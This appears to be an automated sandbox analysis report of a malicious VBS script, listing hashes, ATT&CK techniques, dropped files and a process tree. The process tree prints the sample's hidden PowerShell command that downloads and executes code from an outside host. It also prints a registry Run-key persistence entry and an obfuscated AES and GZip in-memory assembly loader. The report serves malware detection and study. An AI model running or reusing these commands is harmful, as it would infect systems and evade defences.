823fce06a9659813c5c77358e7759ff067902c4c49b10787a2d698bfe55a28a9

General

Target

823fce06a9659813c5c77358e7759ff067902c4c49b10787a2d698bfe55a28a9.vbs
Size

67KB
MD5

12d9b975c280a2500a1f13ee88cd5dcc
SHA1

d2ff34e43857aafc57217cfb7cdc5bb3b2825b66
SHA256

823fce06a9659813c5c77358e7759ff067902c4c49b10787a2d698bfe55a28a9
SHA512

ec0a70030c775ee18f5482e756e6b4abacdf0e14516335771a8995be7059eb037dc18c27d2844927fdde37b17cae9226f173ffda8334e764f478fe2181a31430
SSDEEP

1536:dha8UpBzancwZOnc9/FQa6vYGl2Yo7ZkeXeFuGbVSPXCAG:7Ur2Ocmo7ZkieFuyIG

Score

8^/10

execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2520	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftService = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\system.bat\""	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2520	powershell.exe
2084	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2520	powershell.exe
Token: SeDebugPrivilege	2084	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 3056 wrote to memory of 2520	3056	WScript.exe	30
PID 3056 wrote to memory of 2520	3056	WScript.exe	30
PID 3056 wrote to memory of 2520	3056	WScript.exe	30
PID 3056 wrote to memory of 2656	3056	WScript.exe	33
PID 3056 wrote to memory of 2656	3056	WScript.exe	33
PID 3056 wrote to memory of 2656	3056	WScript.exe	33
PID 2656 wrote to memory of 2128	2656	cmd.exe	35
PID 2656 wrote to memory of 2128	2656	cmd.exe	35
PID 2656 wrote to memory of 2128	2656	cmd.exe	35
PID 2128 wrote to memory of 2500	2128	cmd.exe	37
PID 2128 wrote to memory of 2500	2128	cmd.exe	37
PID 2128 wrote to memory of 2500	2128	cmd.exe	37
PID 2128 wrote to memory of 2084	2128	cmd.exe	38
PID 2128 wrote to memory of 2084	2128	cmd.exe	38
PID 2128 wrote to memory of 2084	2128	cmd.exe	38

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\823fce06a9659813c5c77358e7759ff067902c4c49b10787a2d698bfe55a28a9.vbs"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2520
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\system.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2128
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\system.bat';$Qstz='SpzjXAlzjXAitzjXA'.Replace('zjXA', ''),'TfJIHranfJIHsffJIHofJIHrfJIHmFfJIHinafJIHlfJIHBlofJIHcfJIHkfJIH'.Replace('fJIH', ''),'RVgYzeadVgYzLiVgYznesVgYz'.Replace('VgYz', ''),'InMwMavoMwMakMwMaeMwMa'.Replace('MwMa', ''),'DecsNGQomsNGQpresNGQssNGQssNGQ'.Replace('sNGQ', ''),'CoHJBApyTHJBAoHJBA'.Replace('HJBA', ''),'CrXqfmeatXqfmeDeXqfmcryXqfmptXqfmorXqfm'.Replace('Xqfm', ''),'GeFjYVtFjYVCFjYVurFjYVrenFjYVtFjYVPrFjYVocFjYVesFjYVsFjYV'.Replace('FjYV', ''),'LozlYIazlYIdzlYI'.Replace('zlYI', ''),'CLJmzhLJmzanLJmzgeELJmzxtLJmzenLJmzsLJmzionLJmz'.Replace('LJmz', ''),'EeFjtleeFjtmeeFjtneFjttAeFjtteFjt'.Replace('eFjt', ''),'MdbpiaindbpiModbpiddbpiuledbpi'.Replace('dbpi', ''),'FrRYFzoRYFzmBRYFzaRYFzsRYFze6RYFz4RYFzSRYFztrRYFzinRYFzgRYFz'.Replace('RYFz', ''),'EncrkwtcrkwrcrkwyPocrkwicrkwntcrkw'.Replace('crkw', '');powershell -w hidden;function RgsAI($BWcmp){$GWmwK=[System.Security.Cryptography.Aes]::Create();$GWmwK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$GWmwK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$GWmwK.Key=[System.Convert]::($Qstz[12])('bVSs74+10Z+7ASHf34iR8A7lXdmOJD3coRGmA4lMt4I=');$GWmwK.IV=[System.Convert]::($Qstz[12])('iE6BirpwfNsKBuhzhqFgjw==');$OWgUJ=$GWmwK.($Qstz[6])();$MLceL=$OWgUJ.($Qstz[1])($BWcmp,0,$BWcmp.Length);$OWgUJ.Dispose();$GWmwK.Dispose();$MLceL;}function frMFN($BWcmp){$ssjuW=New-Object System.IO.MemoryStream(,$BWcmp);$upHUk=New-Object System.IO.MemoryStream;$WGXAI=New-Object System.IO.Compression.GZipStream($ssjuW,[IO.Compression.CompressionMode]::($Qstz[4]));$WGXAI.($Qstz[5])($upHUk);$WGXAI.Dispose();$ssjuW.Dispose();$upHUk.Dispose();$upHUk.ToArray();}$DXhXo=[System.IO.File]::($Qstz[2])([Console]::Title);$YYyyJ=frMFN (RgsAI ([Convert]::($Qstz[12])([System.Linq.Enumerable]::($Qstz[10])($DXhXo, 5).Substring(2))));$eqMxD=frMFN (RgsAI ([Convert]::($Qstz[12])([System.Linq.Enumerable]::($Qstz[10])($DXhXo, 6).Substring(2))));[System.Reflection.Assembly]::($Qstz[8])([byte[]]$eqMxD).($Qstz[13]).($Qstz[3])($null,$null);[System.Reflection.Assembly]::($Qstz[8])([byte[]]$YYyyJ).($Qstz[13]).($Qstz[3])($null,$null); "
      4⤵
      PID:2500
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2084

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
66KB

MD5
63de01f12144baf2b505f8eea95ae3a9

SHA1
b1428ef307e63503219af46059b89fb60487f7c4

SHA256
32d96866203a868b1d4f28560239e66421b412cfa184a876485c39da56f3d979

SHA512
de86970f4eff4a449eaf2d992da255b020c6e384c97d02c3e05ea07bb2a67d543d1701c7beed9a23bb88d82097728ad6b4fb452ac48182b44a894a15bcf712d0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
6441f8a07eed3794c2e3e05447456d50

SHA1
c1e5af2e2b05ba546626b18ffa61523521ce81ca

SHA256
c0e8afe003749ce976e11457a7f5e9551c55742d1080ad9e5bfe0e035dacb07f

SHA512
5092d1ec48092dc450ca57e342e9b48c15a02c46423cfee0dda258767258c370b6dad6d0320dce2f14213989f5687f270789702c7ed966c23b27dbd6b819bd78

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HGCNPT18CN1DAQX4STSK.temp

Filesize
7KB

MD5
83ef7bc8d56bbf69012e5e6614062ac8

SHA1
63aa37bfc0c236af3f662205f7d445d5088e2d83

SHA256
ca99d9964611b6a1b8da9b18763a9bfdc377cfca0272308a7bb25769a30d3af0

SHA512
e30274d0357d80f6965775f7ccbaf875f2970e0836b281e9b732a1b1df68c9167c01f6d926bcda0d8284f07541da65719d4089f71f90a6692e1948b009cd75ef

Download Submit
memory/2084-28-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2084-27-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

Filesize
2.9MB

Download
memory/2520-7-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

Filesize
9.6MB

Download
memory/2520-11-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

Filesize
9.6MB

Download
memory/2520-10-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

Filesize
9.6MB

Download
memory/2520-9-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

Filesize
9.6MB

Download
memory/2520-8-0x000007FEF5900000-0x000007FEF629D000-memory.dmp

Filesize
9.6MB

Download
memory/2520-4-0x000007FEF5BBE000-0x000007FEF5BBF000-memory.dmp

Filesize
4KB

Download
memory/2520-6-0x00000000021D0000-0x00000000021D8000-memory.dmp

Filesize
32KB

Download
memory/2520-5-0x000000001B650000-0x000000001B932000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads